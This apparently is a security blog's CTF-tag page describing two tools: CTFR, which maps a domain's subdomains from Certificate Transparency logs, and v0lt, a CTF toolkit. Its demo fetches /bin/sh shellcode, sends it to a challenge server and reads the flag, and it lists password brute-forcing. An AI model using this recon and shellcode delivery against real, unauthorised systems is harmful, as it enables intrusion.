SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

Showing posts with label CTF & Crackmes.

Friday, June 22, 2018

CTFR - Get subdomains of an HTTPS website abusing Certificate Transparency logs


Do you miss the AXFR technique? This tool retrieves the subdomains of an HTTPS website in a few seconds.
How does it work? CTFR uses neither a dictionary attack nor brute force; it simply takes advantage of Certificate Transparency logs.
For more information about CT logs, see www.certificate-transparency.org.
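The core of the CT-log approach is post-processing: a CT search for a domain returns one record per logged certificate, and the names must be normalised, de-duplicated, scoped to the target zone and separated from wildcard entries before they are useful as an exposure inventory. The following is an added example, not CTFR's own code; it assumes a crt.sh-style JSON response with `name_value` and `issuer_name` fields and runs on a constructed sample, so it works offline.

```python
import json
import re

# Constructed sample in the shape of a crt.sh-style JSON response (assumed
# format, not output captured from CTFR): one object per logged certificate,
# matched names newline-separated in "name_value".
SAMPLE_CT_RESPONSE = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "*.dev.example.com\nvpn.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "WWW.Example.COM."},           # same host: case and trailing dot
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "example.com.evil.test"},      # matches the search, not our zone
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "mail.example.com\n*.example.com"},
])

# Loose DNS-name check after lowercasing; rejects e-mail addresses, IPs in
# odd places and garbage that sometimes lands in SAN fields.
HOSTNAME_RE = re.compile(r"^(\*\.)?([a-z0-9-]+\.)+[a-z0-9-]+$")


def ct_subdomains(ct_json: str, domain: str) -> dict:
    """Build {"hosts": {name: [issuers]}, "wildcards": [names]} for `domain`.

    Per-host issuer lists let a defender spot certificates issued by a CA
    they do not use; wildcards are kept apart because they reveal a naming
    pattern rather than a concrete host.
    """
    domain = domain.lower().rstrip(".")
    suffix = "." + domain
    hosts, wildcards = {}, set()
    for entry in json.loads(ct_json):
        issuer = entry.get("issuer_name", "?")
        for raw in entry.get("name_value", "").split("\n"):
            name = raw.strip().lower().rstrip(".")
            if not HOSTNAME_RE.match(name):
                continue
            if name != domain and not name.endswith(suffix):
                continue                      # outside the target zone
            if name.startswith("*."):
                wildcards.add(name)
                continue
            hosts.setdefault(name, set()).add(issuer)
    return {"hosts": {h: sorted(i) for h, i in sorted(hosts.items())},
            "wildcards": sorted(wildcards)}
```

Feeding the same function a live CT search result gives the subdomain list CTFR prints, plus the issuer view that tells you whether any of those certificates came from a CA your organisation never authorised.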

Getting Started
Follow the instructions below to install and run CTFR.

Pre-requisites
Make sure you have installed the following tools:
Python 3.0 or later.
pip3 (sudo apt-get install python3-pip).

Installing
git clone https://github.com/UnaPibaGeek/ctfr.git
cd ctfr
pip3 install -r requirements.txt

Running
python3 ctfr.py --help

Usage
Parameters and examples of use.

Parameters
-d --domain [target_domain] (required)
-o --output [output_file] (optional)

Examples
python3 ctfr.py -d starbucks.com
python3 ctfr.py -d facebook.com -o /home/shei/subdomains_fb.txt


Saturday, April 30, 2016

Security CTF Toy Tools - v0lt





v0lt is an attempt to regroup every tool I used/use/will use in security CTFs, Python style. A lot of exercises were solved using bash scripts, but Python may be more flexible, which is why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:
  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:
  • Crypto
    • Base64
    • Caesar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (dictionary, custom word)
  • Shellcodes
    • Shellcode selection and download from Shell-storm repo
    • Shellcode formatter
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support
    • Netcat
    • Telnet
More examples are available here.

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3
  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2
  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0
  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree


Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community